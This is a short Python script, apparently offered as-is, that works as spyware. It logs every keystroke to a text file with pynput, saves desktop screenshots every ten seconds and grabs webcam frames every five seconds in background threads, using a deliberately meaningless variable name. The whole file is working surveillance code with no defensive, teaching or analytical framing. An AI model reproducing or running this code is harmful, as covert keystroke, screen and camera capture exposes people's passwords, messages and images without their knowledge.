import cv2
import time
import threading
import pyautogui
from pynput import keyboard

var_7423874239874893274238428934982347983242 = []

output_file = "var_7423874239874893274238428934982347983242.txt"

def take_screenshot():
    while True:
        screenshot = pyautogui.screenshot()
        screenshot.save(f"screenshot_{time.time()}.png")
        time.sleep(10) 

def capture_webcam():
    webcam = cv2.VideoCapture(0)
    while True:
        ret, frame = webcam.read()
        if not ret:
            break
        cv2.imwrite(f"webcam_{time.time()}.png", frame)
        time.sleep(5)  

screenshot_thread = threading.Thread(target=take_screenshot)
screenshot_thread.daemon = True
screenshot_thread.start()

webcam_thread = threading.Thread(target=capture_webcam)
webcam_thread.daemon = True
webcam_thread.start()

def on_press(key):
    try:
        # Logging the key pressed
        print(f'Key {key.char} pressed')

        var_7423874239874893274238428934982347983242.append(key.char)
    except AttributeError:
        print(f'Special key {key} pressed')
        var_7423874239874893274238428934982347983242.append(str(key))

    with open(output_file, "a") as file:
        file.write(str(key) + '\n')

def on_release(key):
    if key == keyboard.Key.esc:
        print('Recording stopped.')
        with open(output_file, "w") as file:
            file.write('\n'.join(var_7423874239874893274238428934982347983242))
        return False

with keyboard.Listener(on_press=on_press, on_release=on_release) as listener:
    listener.join()

print('Recorded Keys:', var_7423874239874893274238428934982347983242)